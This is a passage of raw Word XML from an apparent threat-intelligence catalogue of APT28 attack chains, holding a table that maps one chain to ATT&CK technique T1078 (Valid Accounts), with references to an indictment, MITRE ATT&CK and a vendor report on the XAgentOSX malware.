                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D721446" w14:textId="77777777" w:rsidR="004230DB" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C80AA42" w14:textId="77777777" w:rsidR="004230DB" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105B0A" w:rsidRPr="00ED5880" w14:paraId="1BCB8D90" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="033AC5EE" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C7EB0B" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00ED5880" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1090C597" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="004230DB" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF8EBFF" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00ED5880" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14825A8E" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00ED5880" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67D8B91F" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00ED5880" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0042DBAB" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00ED5880" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FF1D6D6" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00ED5880" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D4B6730" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="0077286F" w:rsidRDefault="00285F73" w:rsidP="00285F73"/>
    <w:p w14:paraId="30C28856" w14:textId="4F5FB164" w:rsidR="00285F73" w:rsidRDefault="00285F73" w:rsidP="00285F73">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[1]  </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Indictment (justice.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25252C16" w14:textId="69C0780F" w:rsidR="006312A4" w:rsidRDefault="006312A4" w:rsidP="00285F73">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>XAgentOSX</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0161 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00303A2E">
        <w:t xml:space="preserve"> (ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59447C32" w14:textId="70C3E434" w:rsidR="00C4104C" w:rsidRDefault="00C4104C" w:rsidP="00285F73">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>XAgentOSX</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">: </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sofacy’s</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>XAgent</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> macOS Tool (paloaltonetworks.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00303A2E">
        <w:t xml:space="preserve"> (via Google [2017])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220C9781" w14:textId="581CE6C9" w:rsidR="00285F73" w:rsidRDefault="00285F73" w:rsidP="00285F73"/>
    <w:p w14:paraId="0C1DFAED" w14:textId="77777777" w:rsidR="00AF370A" w:rsidRDefault="00AF370A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="392FA704" w14:textId="70E66199" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc153480851"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">T1078 - </w:t>
      </w:r>
      <w:r w:rsidR="004653C9">
        <w:t>INDICTMENT - The Grand Jury for the District of Columbia charges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="74271898" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">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FB171C" w:rsidRPr="002D1D50" w14:paraId="0D211AAB" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AE77EC0" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DF64538" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BCA5B66" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="53DC6144" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A08D7F4" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50519092" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6423FE37" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="4523181E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="488C4D03" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="007328DE" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="497347BA" w14:textId="3DC330A7" w:rsidR="00FB171C" w:rsidRPr="007328DE" w:rsidRDefault="0005249D" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1078 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66938A07" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="07812012" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E610E1D" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6758DC" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="007328DE" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43C8C02C" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="04D27E83" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FB7FBF9" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504A6A74" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51E2CCAA" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="79AF641C" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A4C1885" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7455713E" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CE649F1" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="2B215891" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58A083E6" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20F106F7" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59A50799" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="01B70922" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="394F804D" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F9EAB5" w14:textId="1B2E2A89" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43ADE856" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="384ACE11" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E60151" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43CD6176" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3920BEF7" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="55103376" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="628C7263" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="410D3D8B" w14:textId="0690719F" w:rsidR="00947A0B" w:rsidRDefault="00096D2B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT28_003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FEE7D2"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10C1F70B" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69931D57" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD98CE3" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73FECB16" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="33F663FE" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
